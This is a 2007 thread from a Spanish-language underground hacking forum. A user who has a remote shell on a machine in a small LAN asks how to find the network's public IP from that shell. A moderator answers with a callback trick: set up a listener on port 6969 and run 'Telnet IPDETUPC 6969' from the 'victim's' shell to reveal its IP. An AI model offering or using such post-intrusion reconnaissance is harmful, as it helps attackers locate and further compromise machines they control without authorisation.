Normas del foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Noviembre 23, 2008, 04:54:14
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  HacK GeneraL (Moderadores: |Shadow|, ManCuerTex (ViPeR))  |  Tema: Cómo saber i.p pública desde una shell remota sin sniffear ni con ent.grafico?? 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Cómo saber i.p pública desde una shell remota sin sniffear ni con ent.grafico??  (Leído 164 veces)
alvaro4356
Habitual
Desconectado Desconectado

Ver Perfil Email
« en: Julio 27, 2007, 12:25:56 »

Bueno, probando por ahí alguno de los tantos metodos de canales inversos en 1 computadora k estaba en 1  red lan pekeña, en la cual había un amigo k estaba ayudandome en mis cosillas(yo estoy en 1 compu aparte, con i.p dinámica), ps, pude conseguir una shell remota, y la i.p pública del router entre otros datos más, la i.p pública del router la pude sacar pork mi amigo se puso en una página de showmyip.com, y ps, ahí le salió. Me surgió la idea, de cómo yo, remotamente desde la shell k obtuve, puedo ver la i.p publica, no privada, del router, sin k haya alguien fisicamente en la red, en especial con comandos dos, .bat o algo k se puede hacer con algún comando en la consola.
ManCuerTex (ViPeR)
Moderador Global
Gran Colaborador
Desconectado Desconectado

Cuando el respeto se pierde... muere la magia

Ver Perfil WWW
« Respuesta #1 en: Julio 27, 2007, 04:17:34 »

Solo debes establecer una conexión desde ese pc al tuyo  y preparar el tuyo para que te muestre todas las conexiones que se establecen con tu pc.

Por ejemplo, preparamos tu pc y lo dejamos a la escucha por el puerto 6969, si tienes shell remota en el pc de la víctima, solo deberás hacer Telnet IPDETUPC 6969.

Y tu pc te mostrará la IP pública de tu víctima.
Yo me hice una tool para mi así, hace tiempo, para dejar mi pc a la escucha y que mostrase las conexiones.

Si tienes router deberás abrir el puerto 6969.

Saludos,

Soñaré Contigo Por Si No Te Veo Mañana...

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
Hacking Empezando desde 0

Mancuertex Hacking & Security

Reto HacK v.2.00.30 by Mancuertex
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  HacK GeneraL (Moderadores: |Shadow|, ManCuerTex (ViPeR))  |  Tema: Cómo saber i.p pública desde una shell remota sin sniffear ni con ent.grafico?? « anterior próximo »
Ir a:  

Ranking-Hits